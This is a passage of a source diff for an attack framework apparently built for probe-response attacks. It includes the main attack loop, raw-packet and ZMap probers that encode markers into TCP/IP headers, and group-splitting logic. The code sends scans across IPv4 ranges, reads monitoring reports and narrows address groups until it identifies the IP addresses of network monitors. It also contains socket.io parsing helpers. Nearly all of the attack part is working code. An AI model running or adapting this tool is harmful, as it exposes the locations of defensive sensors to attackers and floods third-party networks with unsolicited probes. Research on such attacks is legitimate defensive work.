+														self._filename_full_report)
+		self._running = True
+		self.attack_thread = threading.Thread(target=self._do_attack)
+		self.attack_thread.start()
+
+	def stop(self):
+		"""
+		Stops the PRA attack.
+		"""
+		if not self._running:
+			logger.warning("Scanner is not running -> nothing to stop")
+			return
+		self._running = False
+		logger.debug("stopping any scan processes")
+
+		for scanner in self._current_scans:
+			scanner.stop()
+		for sock in self._native_prober_sockets:
+			sock.close()
+		for proc in self._native_prober_processes:
+			proc.terminate()
+
+		addresses_found_amount = sum([gti[0].amount_addresses for gti in self._grouphandler.identified_groups])
+		logger.info("found %d addresses, saving to: %s" % (addresses_found_amount, self._filename_identified_monitors))
+		fd_write = open(self._filename_identified_monitors, "w")
+		fd_write.write("address\ttimestamp\titeration\n")
+
+		for group_timestamp_iteration in self._grouphandler.identified_groups:
+			ts = group_timestamp_iteration[1]
+			iteration = group_timestamp_iteration[2]
+
+			for address in group_timestamp_iteration[0].addresses:
+				line = "%s\t%d\t%d\n" % (address, ts, iteration)
+				fd_write.write(line)
+				#logger.debug(line.strip())
+		fd_write.close()
+		self._save_state()
+
+	def _start_native_prober(self):
+		"""
+		Initiate processes to probe using a native python implementation.
+		"""
+		self._native_prober_conn_send.clear()
+
+		for cnt in range(self._native_prober_amount):
+			socket_hndl = SocketHndl(iface_name=self.interface_name, buffersize_send=2 ** 28)
+			self._native_prober_sockets.append(socket_hndl)
+
+			proc = Process(target=self._probe_native_cycler, args=(cnt,
+																socket_hndl,
+																self._groupqueue,
+																self._blacklist,
+																self.mac_source,
+																self.mac_gw,
+																self.ip_src,
+																self.marker_encoding))
+			self._native_prober_processes.append(proc)
+			proc.start()
+		logger.debug("waiting some seconds for processess to settle")
+		time.sleep(1)
+
+	def _probe_native_cycler(self, cnt, sockethndl, groupqueue, ip_blacklist, mac_src_s, mac_dst_s, ip_src_s, marker_encoding):
+		"""
+		A native prober cycler to be used with processes.
+		"""
+		logger.debug("starting probing process No.%d" % cnt)
+		basepacket = ethernet.Ethernet(dst_s=mac_dst_s, src_s=mac_src_s) +\
+						ip.IP(src_s=ip_src_s, dst_s="1.2.3.4") +\
+						tcp.TCP(sport=50821)
+		#logger.debug("basepacket: %r" % basepacket)
+
+		send = sockethndl.send
+		ip_obj = basepacket.body_handler
+		ip_obj_bin = ip_obj.bin
+		tcp_obj = ip_obj.tcp
+		ether_bytes = basepacket.header_bytes
+		# initialize packet data
+		basepacket.bin()
+
+		queue_get = groupqueue.get
+
+		while True:
+			marker, addresses_bytes, is_cidr = queue_get()
+			# blacklists are only used for CIDR groups; single addresses were created from feedback IPs
+			#logger.debug("sending...")
+
+			for ip_address in addresses_bytes:
+				# single addresses or (cidr and not in blacklist)
+				if is_cidr and ip_address in ip_blacklist:
+					#logger.debug("not sending because in blacklist: addr=%r, CIDR=%r" % (ip_address, is_cidr))
+					continue
+				ip_obj.dst = ip_address
+				bytes_used = 0
+				#if cnt % 2000 == 0:
+				#	logger.debug("%d: placing marker: %r" % (self._group_storeindex, marker))
+				#	#time.sleep(0.2)
+				#cnt += 1
+				# this assumes that all marker types are fully used
+				if marker_encoding & ENCODE_PORT_DST == ENCODE_PORT_DST:
+					tcp_obj.dport = unpack_port(marker[: 2])[0]
+					bytes_used += 2
+				if marker_encoding & ENCODE_IP_SRC == ENCODE_IP_SRC:
+					ip_obj.src = marker[bytes_used: bytes_used + 4]
+					bytes_used += 4
+				if marker_encoding & ENCODE_PORT_SRC == ENCODE_PORT_SRC:
+					tcp_obj.sport = unpack_port(marker[bytes_used: bytes_used + 2])[0]
+				# TODO: use update_auto_fields=False for faster packet creation
+				send(ether_bytes + ip_obj_bin())
+				#send(ether_bytes + ip_obj_bin(update_auto_fields=False))
+
+	def _do_attack(self):
+		"""
+		Main attack loop to cycle through iterations until all monitors have been found.
+		"""
+		group_handler_obj = self._grouphandler
+
+		while self._running:
+			self._iterations.append([[0, 0], {}, 0, 0])
+			self._group_storeindex += 1
+			self._iterations[self._group_storeindex][0] = [time.time(), 0]
+			logger.info("new attack round! group store index: %d" % self._group_storeindex)
+
+			# after initial full scan
+			if self._group_storeindex >= 2:
+				logger.info("initiating subgrouping using group handler, top groups=%d" % len(self._iterations[self._group_storeindex - 1][1]))
+
+				if self.use_feedback_ips and self._group_storeindex == 2:
+					self._read_scanner_feedback_addresses()
+
+				# create subgroups from groups of last round
+				group_handler_obj.init_subgroup_creating(self._iterations[self._group_storeindex - 1][1],
+														self._iterations[self._group_storeindex][1],
+														self._blacklist_toptoipv4obj)
+
+			if group_handler_obj.state == group_handler.STATE_FINISHED:
+				logger.info("no groups left to scan, all monitors found")
+				self._iterations[self._group_storeindex][0][1] = time.time()
+				break
+			elif self._group_storeindex > 1:
+				logger.debug("letting group handler create some groups in advance..")
+				time.sleep(10)
+
+			self._report_fetcher.before_scanning()
+
+			# limit scanner feedback saving to first iteration
+			filename_output_csv = self._filename_scannerresponse_stage1 if self._group_storeindex == 1 else None
+
+			if self._group_storeindex == 2:
+				# scanner feedback should have been read by now; start the native probers, which need the blacklist
+				self._start_native_prober()
+
+			cnt = 0
+
+			# scan groups until handler has no groups left or we are initially scanning in stage 1
+			while group_handler_obj.state != group_handler.STATE_INACTIVE or self._group_storeindex == 1:
+				"""
+				# Iteration 0: [g_r00t]
+				# Iteration 1: [g1], [g2], ... <- auto-created by response (we did not create '+1'-groups)
+				# Iteration 2: [g1, +1][g2, +1] <- updated by group handler
+				"""
+				group = None
+
+				# this is skipped in the first iteration
+				if self._group_storeindex >= 2:
+					while group is None and group_handler_obj.state != group_handler.STATE_INACTIVE:
+						try:
+							# this blocks until a new group is available
+							# logger.debug("next group..")
+							group = group_handler_obj.get_next_subgroup()
+							#logger.debug("got a group from grouphandler, marker=%r, group=%r" %
+							#			 (group.marker_bytes, group))
+						except queue.Empty:
+							# loop over timeouts until we got a group or state of grouphandler changes
+							#logger.debug("Empty...")
+							time.sleep(1)
+							pass
+					# no groups left, break scan loop
+					if group is None:
+						break
+				else:
+					# initial scan? -> take initial group
+					group = self._iterations[0][1][self._root_group_name]
+
+				cnt += 1
+				#if cnt % 10000 == 0:
+				#	logger.debug("scan loop %d" % cnt)
+
+				if group.is_plus1:
+					# logger.debug("got a +1 group, not sending: %r" % group)
+					continue
+
+				# group size is too small: send probes via the native implementation.
+				# using ZMap would be too inefficient: trade-off between the
+				# cost of creating a scan process (ZMap) vs. native probe costs
+				if (group.amount_addresses < 5000 or group.group_type == Group.GROUP_TYPE_SINGLE_ADDRESSES)\
+						and self._group_storeindex != 1:
+					if cnt % 100000 == 0:
+						logger.info("adding %d address for native probing, cnt=%d, queue grouphandler=%d" %
+									(group.amount_addresses, cnt, len(self._grouphandler._group_queue)))
+					#if self._group_storeindex >= 2:
+					#	logger.debug("group=%r, CIDR=%r" % (group, group.group_type == Group.GROUP_TYPE_CIDR))
+					self._groupqueue.put([group.marker_bytes,
+										group.addresses_single_bytes,
+										group.group_type == Group.GROUP_TYPE_CIDR])
+					#time.sleep(0.1)
+				else:
+					blacklist = self._filename_ip_blacklist
+
+					if self.use_feedback_ips and self._group_storeindex >= 2 and group.group_type == Group.GROUP_TYPE_CIDR:
+						# use extended blacklist file for CIDR (avoid scanning of single IPs which
+						# are already scanned by separate groups)
+						blacklist = self._filename_ip_blacklist_plus_feedback_ips
+
+					self._current_scans.clear()
+
+					#if group.amount_addresses > 499:
+					logger.debug("probing via zmap: max amount addresses=%r, group=%r, markervalue=%r" %
+									(group.amount_addresses, group, group.marker_value_int))
+					#	time.sleep(2)
+					scan_timeout = -1
+					# TODO: just for testing: stop scanning after x seconds
+
+					"""
+					if self._group_storeindex == 1:
+						scan_timeout = 60 * 60
+						#scan_timeout = 10
+						logger.debug("limiting scan to %d seconds" % scan_timeout)
+					"""
+					# group.markervalue: this is None in the first stage -> encode target address
+					# checksum: the ZMap module has its own implementation, which is needed by stage 0
+					# (create checksum of IP addresses from whole IPv4 address range)
+					scanner = scanner_wrapper.ZmapWrapper(
+								filename_output_csv=filename_output_csv,
+								filename_blacklist_target_ip=blacklist,
+								filename_whitelist_target_ip=self._filename_ip_whitelist,
+								# TODO: comment in to save scanner logs, disables scanner feedback!
+								#dirname_logs=self._dirname_scanner_logs,
+								rate_kbit_per_s=self.rate_kbit_per_s,
+								interface_name=self.interface_name,
+								mac_source=self.mac_source,
+								mac_gw=self.mac_gw,
+								marker_encoding=self.marker_encoding,
+								markervalue=group.marker_value_int,
+								markerbits_value=self.markerbits_value,
+								markerbits_checksum=self.markerbits_checksum,
+								disable_monitor=self.disable_monitor,
+								verbosity=3,
+								dir_zmap=self.base_dir_zmap,
+								target_addresses=group.addresses,
+								fast_mode=False,
+								scan_timeout=scan_timeout)
+					self._current_scans.append(scanner)
+					scanner.start()
+					self._current_scans.clear()
+
+					# we don't use the grouphandler so we have to break here
+					if self._group_storeindex == 1:
+						break
+
+			while self._grouphandler.queuesize > 0:
+				logger.debug("waiting until all queued native probes have been processed, queue: %d" % self._grouphandler.queuesize)
+				time.sleep(5)
+			while not self._groupqueue.empty():
+				logger.debug("waiting until group queue has been emptied")
+				time.sleep(5)
+
+			self._report_fetcher.after_scanning()
+			self._iterations[self._group_storeindex][0][1] = time.time()
+
+			logger.info("duration of round %d: %d seconds, groups (should be unchanged)=%d" % (
+								self._group_storeindex,
+								int(self._iterations[self._group_storeindex][0][1] - self._iterations[self._group_storeindex][0][0]),
+								len(self._iterations[self._group_storeindex][1])))
+
+			if self._group_storeindex >= 2:
+				if self.use_plus1:
+					group_handler_obj.update_plus1_subgroups(self._iterations[self._group_storeindex - 1][1])
+			self._iterations[self._group_storeindex][2] = len(self._iterations[self._group_storeindex][1])
+			self._iterations[self._group_storeindex][3] = sum([group.amount_addresses
+													for _,group in self._iterations[self._group_storeindex][1].items()])
+			group_handler_obj.remove_empty_groups(self._iterations[self._group_storeindex][1])
+		self.stop()
+
+	def get_amount_of_probes(self):
+		"""
+		Return the total amount of probes (or network packets) sent out.
+		"""
+		# - Single feedback addresses could have been scanned: remove redundantly counted single addresses
+		# len([group1, group2]) -> len([singleaddr_group1, group1-singleaddr_group1, ...])
+		return self._grouphandler.addresses_total - len(self._blacklist)

+ 143 - 0
attack_framework/bugfix_socketio/parsers.py

@@ -0,0 +1,143 @@
+import json
+from collections import namedtuple
+
+from .symmetries import (
+    decode_string, encode_string, get_byte, get_character, parse_url)
+
+
+EngineIOSession = namedtuple('EngineIOSession', [
+    'id', 'ping_interval', 'ping_timeout', 'transport_upgrades'])
+SocketIOData = namedtuple('SocketIOData', ['path', 'ack_id', 'args'])
+
+
+def parse_host(host, port, resource):
+    if not host.startswith('http'):
+        host = 'http://' + host
+    url_pack = parse_url(host)
+    is_secure = url_pack.scheme == 'https'
+    port = port or url_pack.port or (443 if is_secure else 80)
+    url = '%s:%d%s/%s' % (url_pack.hostname, port, url_pack.path, resource)
+    return is_secure, url
+
+
+def parse_engineIO_session(engineIO_packet_data):
+    d = json.loads(decode_string(engineIO_packet_data))
+    return EngineIOSession(
+        id=d['sid'],
+        ping_interval=d['pingInterval'] / float(1000),
+        ping_timeout=d['pingTimeout'] / float(1000),
+        transport_upgrades=d['upgrades'])
+
+
+def encode_engineIO_content(engineIO_packets):
+    content = bytearray()
+    for packet_type, packet_data in engineIO_packets:
+        packet_text = format_packet_text(packet_type, packet_data)
+        content.extend(_make_packet_prefix(packet_text) + packet_text)
+    return content
+
+
+def decode_engineIO_content(content):
+    content_index = 0
+    content_length = len(content)
+    while content_index < content_length:
+        try:
+            content_index, packet_length = _read_packet_length(
+                content, content_index)
+        except IndexError:
+            break
+        content_index, packet_text = _read_packet_text(
+            content, content_index, packet_length)
+        engineIO_packet_type, engineIO_packet_data = parse_packet_text(
+            packet_text)
+        yield engineIO_packet_type, engineIO_packet_data
+
+
+def format_socketIO_packet_data(path=None, ack_id=None, args=None):
+    socketIO_packet_data = json.dumps(args, ensure_ascii=False) if args else ''
+    if ack_id is not None:
+        socketIO_packet_data = str(ack_id) + socketIO_packet_data
+    if path:
+        socketIO_packet_data = path + ',' + socketIO_packet_data
+    return socketIO_packet_data
+
+
+def parse_socketIO_packet_data(socketIO_packet_data):
+    # fix decoding if the server does not use UTF-8 (decode_string will try UTF-8 and latin-1)
+    try:
+        data = decode_string(socketIO_packet_data)
+    except Exception as ex:
+        print("Error on decoding data:")
+        print(socketIO_packet_data)
+        data = ""
+    if data.startswith('/'):
+        try:
+            path, data = data.split(',', 1)
+        except ValueError:
+            path = data
+            data = ''
+    else:
+        path = ''
+    try:
+        ack_id_string, data = data.split('[', 1)
+        data = '[' + data
+        ack_id = int(ack_id_string)
+    except (ValueError, IndexError):
+        ack_id = None
+    try:
+        args = json.loads(data)
+    except ValueError:
+        args = []
+    return SocketIOData(path=path, ack_id=ack_id, args=args)
+
+
+def format_packet_text(packet_type, packet_data):
+    return encode_string(str(packet_type) + packet_data)
+
+
+def parse_packet_text(packet_text):
+    packet_type = int(get_character(packet_text, 0))
+    packet_data = packet_text[1:]
+    return packet_type, packet_data
+
+
+def get_namespace_path(socketIO_packet_data):
+    if not socketIO_packet_data.startswith(b'/'):
+        return ''
+    # Loop incrementally in case there is binary data
+    parts = []
+    for i in range(len(socketIO_packet_data)):
+        character = get_character(socketIO_packet_data, i)
+        if ',' == character:
+            break
+        parts.append(character)
+    return ''.join(parts)
+
+
+def _make_packet_prefix(packet):
+    length_string = str(len(packet))
+    header_digits = bytearray([0])
+    for i in range(len(length_string)):
+        header_digits.append(ord(length_string[i]) - 48)
+    header_digits.append(255)
+    return header_digits
+
+
+def _read_packet_length(content, content_index):
+    while get_byte(content, content_index) != 0:
+        content_index += 1
+    content_index += 1
+    packet_length_string = ''
+    byte = get_byte(content, content_index)
+    while byte != 255:
+        packet_length_string += str(byte)
+        content_index += 1
+        byte = get_byte(content, content_index)
+    return content_index, int(packet_length_string)
+
+
+def _read_packet_text(content, content_index, packet_length):
+    while get_byte(content, content_index) == 255:
+        content_index += 1
+    packet_text = content[content_index:content_index + packet_length]
+    return content_index + packet_length, packet_text
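+
+
+if __name__ == '__main__':
+    # Minimal round-trip sketch of the length-prefix framing above
+    # (illustrative values; this demo block is a sketch, not part of the library API)
+    packet = b'4"hello"'                             # 8 bytes of packet text
+    content = _make_packet_prefix(packet) + packet   # bytearray([0, 8, 255]) + packet
+    index, length = _read_packet_length(content, 0)  # length == 8
+    index, text = _read_packet_text(content, index, length)
+    assert bytes(text) == packet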

+ 32 - 0
attack_framework/bugfix_socketio/symmetries.py

@@ -0,0 +1,32 @@
+import six
+try:
+    from urllib import urlencode as format_query
+except ImportError:
+    from urllib.parse import urlencode as format_query
+try:
+    from urlparse import urlparse as parse_url
+except ImportError:
+    from urllib.parse import urlparse as parse_url
+try:
+    memoryview = memoryview
+except NameError:
+    memoryview = buffer
+
+
+def get_character(x, index):
+    return chr(get_byte(x, index))
+
+
+def get_byte(x, index):
+    return six.indexbytes(x, index)
+
+
+def encode_string(x):
+    return x.encode('utf-8')
+
+
+def decode_string(x):
+    try:
+        return x.decode('utf-8')
+    except UnicodeDecodeError:
+        return x.decode('latin-1')

+ 252 - 0
attack_framework/group.py

@@ -0,0 +1,252 @@
+import logging
+import math
+
+logger = logging.getLogger("pra_framework")
+
+
+class Group(object):
+	"""
+	A Group represents a group of IP addresses regarding the PRA.
+	It's generally connected to a marker value for identification purposes.
+	A Group contains single addresses (group_type == Group.GROUP_TYPE_SINGLE_ADDRESSES)
+	OR address ranges (group_type == Group.GROUP_TYPE_CIDR)
+	"""
+	GROUP_TYPE_SINGLE_ADDRESSES = 0
+	GROUP_TYPE_CIDR = 1
+
+	def __init__(self,
+				ip_network_object=None,
+				ip_host_objects=None,
+				response_count=0):
+		"""
+		Given parameters: the IPs this group is made of.
+		ip_network_object -- IPv4Network object to create this group from
+		ip_host_objects -- IP objects used to create this group
+		"""
+		self.ip_network = None
+		self.ip_hosts = None
+
+		if ip_network_object is not None:
+			self.ip_network = ip_network_object
+		else:
+			self.ip_hosts = ip_host_objects
+		# "+1"-groups won't get scanned, the amount of responses is derived implicitly
+		self.is_plus1 = False
+		# store "+1"-Subgroup for faster access (marker bytes OR group itself)
+		self.plus1_subgroup = None
+		# logger.debug("group network/addresses: %r/%r" % (self.ip_network, self.ip_hosts))
+		# full marker as bytes
+		self.marker_bytes = None
+		self.marker_value_int = None
+		# how many times the group is counted in the report
+		self.response_count = response_count
+		# needed to create additional blacklists for other groups which do not need
+		# to scan these addresses again (already placed in a separate group)
+		self.top_group = None
+		self.subgroups = set()
+		# indicates that this subgroup has response count unequal
+		# to the sum of responses of all its subgroups
+		# positive value: top group has more responses than sum of all subgroups, negative value: less ...)
+		# TODO: activate if needed (deactivated to save memory)
+		#self.response_discrepancy = 0
+
+	def _get_grouptype(self):
+		return Group.GROUP_TYPE_CIDR if self.ip_network is not None else Group.GROUP_TYPE_SINGLE_ADDRESSES
+
+	group_type = property(_get_grouptype)
+
+	def _get_amount_addresses(self):
+		return self.ip_network.num_addresses if self.group_type == Group.GROUP_TYPE_CIDR else len(self.ip_hosts)
+
+	amount_addresses = property(_get_amount_addresses)
+
+	def add_subgroup(self, group):
+		group.top_group = self
+		#group.top_group_markervalue_bytes = self.markervalue_bytes
+		self.subgroups.add(group)
+
+	def create_subgroups(self, amount_subgroups, ipv4_addresses=[], use_plus1=False):
+		"""
+		Create amount subgroups based on amount_subgroups and response counts.
+		amount_subgroups -- amount of subgroups to create, this includes the +1 group
+			e.g. amount_subgroups = 4 = subgroups + "+1"
+		ipv4_addresses -- list of single IP addresses as IP objects to be added as dedicated group.
+		use_plus1 -- define last subgroup as +1 group
+		return -- created subgroups as list
+		"""
+		subgroups = []
+
+		if self.response_count >= self.amount_addresses:
+			if self.response_count > self.amount_addresses:
+				logger.warning("got more responses than amount addresses, too much noise?"
+								" responses/# addresses = %d/%d" % (self.response_count, self.amount_addresses))
+			return subgroups
+		# check if this is a single address group (CIDR prefix is 32 or just 1 single address)
+		if self.amount_addresses <= 1:
+			return subgroups
+
+		if self.group_type == Group.GROUP_TYPE_SINGLE_ADDRESSES:
+			single_addr_amount = len(self.ip_hosts)
+			"""
+			logger.debug("subgrouping single addresses: addresses/target subgroups = %d/%d" %
+						(single_addr_amount, amount_subgroups))
+			"""
+			if single_addr_amount == 0:
+				logger.warning("no host for subgrouping!")
+
+			# split by amount of addresses
+			groupsize_single = math.floor(single_addr_amount / amount_subgroups)
+			# at minimum 1 group
+			groupsize_single = max(1, groupsize_single)
+
+			for i in range(0, single_addr_amount, groupsize_single):
+				# not enough room for more groups, add all remaining addresses
+				if len(subgroups) + 1 >= amount_subgroups:
+					subgroup = Group(ip_host_objects=self.ip_hosts[i:])
+					subgroups.append(subgroup)
+					break
+				else:
+					sub_ips = self.ip_hosts[i: i + groupsize_single]
+					# this should not happen
+					if len(sub_ips) != 0:
+						subgroup = Group(ip_host_objects=sub_ips)
+						subgroups.append(subgroup)
+					else:
+						break
+
+		elif self.group_type == Group.GROUP_TYPE_CIDR:
+			subgroups_single_addresses = 0
+			#logger.debug("picking IPv4 addresses which belong to this groups (searching through: %d)" % len(ip_host_objects))
+			single_addresses_for_regrouping = ipv4_addresses
+			# amount of single addresses to be re-grouped
+			single_addr_amount = len(single_addresses_for_regrouping)
+
+			if single_addr_amount > 0:
+				if len(single_addresses_for_regrouping) > 0:
+					#logger.debug("re-grouping %d single addresses for nw %r" % (single_addr_amount, self.ip_network))
+					#for single_addr in single_addresses_for_regrouping:
+					#	logger.debug("%r" % single_addr)
+					# calculate amount of subgroups for single addresses:
+					# (amount of single addresses / total group address space) * amount of groups
+					subgroups_single_addresses = math.floor((single_addr_amount / self.ip_network.num_addresses) *
+													amount_subgroups)
+					# at minimum 1 group
+					subgroups_single_addresses = max(1, subgroups_single_addresses)
+					# not more groups than single addresses
+					subgroups_single_addresses = min(single_addr_amount, subgroups_single_addresses)
+					groupsize_single = math.floor(single_addr_amount / subgroups_single_addresses)
+					"""
+					logger.debug("creating single addresses groups,"
+								"addr total=%d, groups total=%d, group size=: %d/%d/%d" %
+								(single_addr_amount,
+								subgroups_single_addresses,
+								groupsize_single))
+					"""
+					for i in range(0, single_addr_amount, groupsize_single):
+						if len(subgroups) + 1 >= subgroups_single_addresses:
+							group = Group(ip_host_objects=single_addresses_for_regrouping[i:])
+							#logger.debug("adding single addresses group: %r" % group)
+							subgroups.append(group)
+							break
+						else:
+							addresses = single_addresses_for_regrouping[i: i + groupsize_single]
+
+							if len(addresses) != 0:
+								group = Group(ip_host_objects=addresses)
+								#logger.debug("adding single addresses group: %r" % group)
+								subgroups.append(group)
+							else:
+								# no more groups to split up
+								break
+
+			# round down to the next power of two with 2**x <= (amount of groups for CIDR)
+			# Example: 16 IPs / 5 subgroups -> 2**floor(log2(5)) = 4 top groups [4,4,4,4]
+			# (which are split up later on) -> [4,4,4,2,2]
+			cidr_bits_plus = math.floor(math.log(
+									amount_subgroups - subgroups_single_addresses,
+									2))
+			# not more CIDR bits than available
+			cidr_bits_plus = min(32 - self.ip_network.prefixlen, cidr_bits_plus)
+			"""
+			logger.debug("current prefix=%d, CIDR bits plus=%d, amount subgroups=%d, single addresses=%d" %
+						(self.ip_network.prefixlen, cidr_bits_plus, amount_subgroups, subgroups_single_addresses))
+			"""
+			# create subnets: e.g. 1.2.3.0/24 -> CIDR+1 -> 1.2.3.0/25, 1.2.3.128/25
+			cidr_nw = self.ip_network.subnets(prefixlen_diff=cidr_bits_plus)
+			cidr_nw_len_at_start = len(cidr_nw)
+			# amount of times we reached CIDR /32
+			splitfail_cnt = 0
+			# logger.debug("re-splitting groups for CIDR, initial groupsize/target amount of groups/CIDR bits +x: %d/%d/%d" %
+			#			(cidr_nw_len_at_start, amount_groups_for_cidr, cidr_bits_plus))
+			subgroup_len = len(subgroups)
+
+			while len(cidr_nw) + subgroup_len < amount_subgroups:
+				# split subgroups until we have enough of them
+				# [A,B,C,D] -> split A by 1 bit -> [B,C,D,a,a] -> split B by 1 bit -> [C,D,a,a,b,b] ...
+				group_to_split = cidr_nw[0]
+				del cidr_nw[0]
+
+				if group_to_split.prefixlen == 32:
+					# nothing to split: re-append to the end
+					cidr_nw.append(group_to_split)
+					splitfail_cnt += 1
+					#logger.debug("can't create subnets anymore: /32 reached for %r" % group_to_split)
+					if splitfail_cnt > len(cidr_nw):
+						# logger.warning("too many split fails: single addresses reached?")
+						break
+				else:
+					subnets = group_to_split.subnets(prefixlen_diff=1)
+					if subgroup_len + len(cidr_nw) + len(subnets) > amount_subgroups:
+						logger.debug("!!! stopping CIDR subgrouping: split would increase max number")
+						cidr_nw.append(group_to_split)
+						break
+					#logger.debug("new subgroups: %d" % len(subnets))
+					# append subnet to the end and try next
+					cidr_nw.extend(subnets)
+
+			if cidr_nw_len_at_start == len(cidr_nw):
+				# logger.debug("no CIDR groups have been re-splitted (perhaps there were enough (2**x)): %d" %
+				#			cidr_nw_len_at_start)
+				pass
+
+			# then add CIDR based groups
+			for nw in cidr_nw:
+				#logger.debug("g5: adding sub: %r" % nw)
+				group = Group(ip_network_object=nw)
+				subgroups.append(group)
+
+		if use_plus1 and len(subgroups) > 1:
+			subgroups[-1].is_plus1 = True
+		"""
+		if len(subgroups) < 600:
+			for g in subgroups:
+				logger.debug("%r" % g)
+		"""
+		# state should now be: [single address groups]+[CIDR groups]
+		return subgroups
+
+	def _addr_get(self):
+		addr = []
+		if self.ip_network is not None:
+			addr.append(self.ip_network.compressed)
+		else:
+			addr.extend([host.compressed for host in self.ip_hosts])
+		return addr
+	# return all addresses as list of strings (mixed CIDR and single notation)
+	addresses = property(_addr_get)
+
+	def _addr_get_single_bytes(self):
+		if self.group_type == Group.GROUP_TYPE_CIDR:
+			return self.ip_network.hosts
+		else:
+			return [host.packed for host in self.ip_hosts]
+	# return all addresses as a list of bytes (only single non-CIDR notation)
+	addresses_single_bytes = property(_addr_get_single_bytes)
+
+	def __repr__(self):
+		if self.group_type == Group.GROUP_TYPE_CIDR:
+			# "1.2.3.4/x"
+			return self.ip_network.compressed
+		else:
+			# "1.2.3.4 1.2.3.5 ..."
+			return " ".join([host.compressed for host in self.ip_hosts])

+ 373 - 0
attack_framework/group_handler.py

@@ -0,0 +1,373 @@
+import logging
+import time
+import math
+import threading
+import struct
+from queue import Queue, Empty
+from collections import deque
+
+logger = logging.getLogger("pra_framework")
+pack_byte = struct.Struct(">B").pack
+pack_4bytes = struct.Struct(">I").pack
+
+STATE_INACTIVE = 0
+STATE_SUBGROUPING = 1
+STATE_READING_SAVED_GROUPS = 2
+STATE_FINISHED = 4
+
+class GroupHandler(object):
+	"""
+	Creates new groups asynchronously.
+	Lifecycle:
+	init_subgroup_creating() -> while group_handler.state == STATE_SUBGROUPING: get_next_subgroup()
+	-queue empty and subgrouping finished-> STATE_INACTIVE
+	(or STATE_FINISHED once no groups are left to resplit)
+	"""
+	def __init__(self, marker_value_amount,
+						use_plus1,
+						create_marker_callback):
+		self._marker_value_amount = marker_value_amount
+		self._state = STATE_INACTIVE
+		self._use_plus1 = use_plus1
+		self._create_marker_callback = create_marker_callback
+		#self._group_queue = Queue(500000)
+		self._group_queue_maxlen = 1000000
+		self._group_queue = deque(maxlen=self._group_queue_maxlen)
+		self._subgroup_create_thread = None
+		self._identified_groups = []
+		self._subgrouping_finished = True
+		self._iteration = 0
+		self._feedback_addresses = None
+		self._addresscount = 0
+
+	def _get_state(self):
+		return self._state
+	# One of STATE_INACTIVE, STATE_FINISHED, STATE_SUBGROUPING
+	state = property(_get_state)
+
+	def _get_queuesize(self):
+		return len(self._group_queue)
+	queuesize = property(_get_queuesize)
+
+	def _get_identified_groups(self):
+		return self._identified_groups
+	identified_groups = property(_get_identified_groups)
+
+	def _get_addresses_total(self):
+		return self._addresscount
+
+	# total amount of created addresses for probing (single addresses in group intersections not removed)
+	addresses_total = property(_get_addresses_total)
+
+	def init_subgroup_creating(self, top_groups, subgroup_storage, feedback_addresses):
+		"""
+		Initiate subgroup creating. If no more groups are left for subgrouping, then
+		all monitor IP addresses are found and the attack is finished.
+
+		top_groups -- groups to resplit
+		subgroup_storage -- dict for storing groups
+		feedback_addresses -- list of IPv4Address objects for re-clustering
+		"""
+		logger.debug("group creating initiated, queue length (should be 0)=%d" % self.queuesize)
+		if self._state != STATE_INACTIVE:
+			logger.warning("state not inactive, have all groups been read? queue=%d" %
+						len(self._group_queue))
+			return
+		self._state = STATE_SUBGROUPING
+		self._feedback_addresses = feedback_addresses
+		self._iteration += 1
+
+		# maps marker -> [group, amount_subgroups]
+		groups_to_resplit = {}
+		# responses of NON identified groups, needed to distribute marker
+		responses_total = 0
+		# stop once only x% non-identified addresses are left.
+		# this assumes low noise, otherwise we stop too early
+		addresses_fromnonidentified_total = 0
+
+		# Count total amount of responses from report.
+		# In iteration 1 groups have been created by response at iteration 0
+		# Don't count identified groups.
+		for marker, group in top_groups.items():
+			if group.response_count < group.amount_addresses:
+				responses_total += group.response_count
+				addresses_fromnonidentified_total += group.amount_addresses
+				# We only take non-identified groups (response count < addresses per group)
+				# which have at minimum 1 response
+				if group.response_count != 0:
+					#logger.debug("group to be resplittet: %r" % group)
+					groups_to_resplit[marker] = [group, 0]
+			elif group.response_count >= group.amount_addresses:
+				# BE WARNED: no responses to other groups could also mean: missed responses because
+				# of network errors etc. In this case the "+1" group is counted as identified
+				"""
+				logger.info("group was identified: %r, response count/total addresses = %d/%d" %
+							(group, group.response_count, group.amount_addresses))
+				"""
+				"""
+				def show_hierarchy(group):
+					gs = [group]
+					_top_group = group.top_group
+					while _top_group is not None:
+						gs.append(_top_group)
+						_top_group = _top_group.top_group
+					p = ["%r" % g for g in gs]
+					print(" -> ".join(p))
+				show_hierarchy(group)
+				"""
+				self._identified_groups.append([group, int(time.time()), self._iteration])
+
+		# stop if nearly all nodes have been identified. This avoids endless attack loops
+		# because of disappearing monitor nodes
+		# add one to avoid division by zero
+		if responses_total / (addresses_fromnonidentified_total + 1) > 0.99:
+			logger.info("fraction of identified monitors reached: responses/addresses (non identified) = %d/%d = %f" %
+						(responses_total, addresses_fromnonidentified_total, (responses_total / addresses_fromnonidentified_total)))
+			self._state = STATE_FINISHED
+			return
+		elif len(groups_to_resplit) == 0:
+			logger.info("no groups left to create subgroups from, identified groups=%d" % len(self._identified_groups))
+			self._state = STATE_FINISHED
+			return
+
+		self._subgroup_create_thread = threading.Thread(target=self._subgroups_create_cycler,
+														args=(groups_to_resplit,
+														subgroup_storage,
+														responses_total))
+		logger.debug("starting subgroup creating using %d top groups" % len(groups_to_resplit))
+		self._subgroup_create_thread.start()
+
+	def get_next_subgroup(self):
+		"""
+		return -- next group; raises Empty if no group is currently available.
+			The handler state switches to STATE_INACTIVE if no groups are left AND no more
+			groups can be created (subgroup creating finished).
+		"""
+		try:
+			return self._group_queue.popleft()
+		except IndexError:
+			# subgrouping finished and queue is empty: change state to inactive
+			if self._subgrouping_finished:
+				logger.debug("!!! switching to STATE_INACTIVE")
+				self._state = STATE_INACTIVE
+			raise Empty
+
+	def _subgroups_create_cycler(self, groups_to_resplit, subgroup_storage, responses_total):
+		"""
+		Create new subgroups incrementally.
+
+		groups_to_resplit -- dict mapping marker -> [group, amount_subgroups (init 0)]
+		subgroup_storage -- dictionary to store new subgroups
+		responses_total -- sum of all responses for all subgroups
+		"""
+		# markers (amount of subgroups) are distributed based on the amount of responses from the first stage:
+		# amount per subgroup = (responses per top-group)/(total responses) * (amount of markers)
+		# more feedback = more markers
+		logger.debug("setting new marker frequencies per group")
+		self._subgrouping_finished = False
+
+		for marker in groups_to_resplit.keys():
+			group = groups_to_resplit[marker][0]
+			groups_to_resplit[marker][1] = math.floor((group.response_count / responses_total) * self._marker_value_amount)
+			"""
